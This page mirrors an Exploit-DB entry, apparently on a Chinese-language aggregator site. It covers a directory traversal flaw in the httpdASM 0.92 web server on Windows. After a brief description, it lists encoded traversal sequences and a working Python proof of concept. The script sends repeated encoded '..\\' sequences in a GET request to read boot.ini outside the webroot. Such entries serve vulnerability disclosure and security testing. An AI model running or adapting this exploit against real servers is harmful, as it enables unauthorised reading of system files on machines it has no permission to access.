httpdasm 0.92 – Directory Traversal

• Exploit Database
• 105 阅读

• 作者： John Leitch
  日期： 2010-12-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15861/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

  # ------------------------------------------------------------------------   # Software................httpdASM 0.92   # Vulnerability...........Directory Traversal   # Download................http://www.japheth.de/httpdASM.html   # Release Date............12/27/2010   # Tested On...............Windows XP   # ------------------------------------------------------------------------   # Author..................John Leitch   # Site....................http://www.johnleitch.net/   # Email...................john.leitch5@gmail.com   # ------------------------------------------------------------------------   #   # --Description-- # # A directory traversal vulnerability in httpdASM 0.92 can be exploited # to read files outside of the webroot directory. # # # --Exploit-- # # %2E%2E%5C # %2E%2E%2F # # # --PoC--       import socket   host = 'localhost' port = 80   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(8) s.connect((host, port)) s.send('GET /' + '%2E%2E%5C' * 8 + 'boot.ini HTTP/1.1\r\n' 'Host: ' + host + '\r\n\r\n');   print s.recv(8192);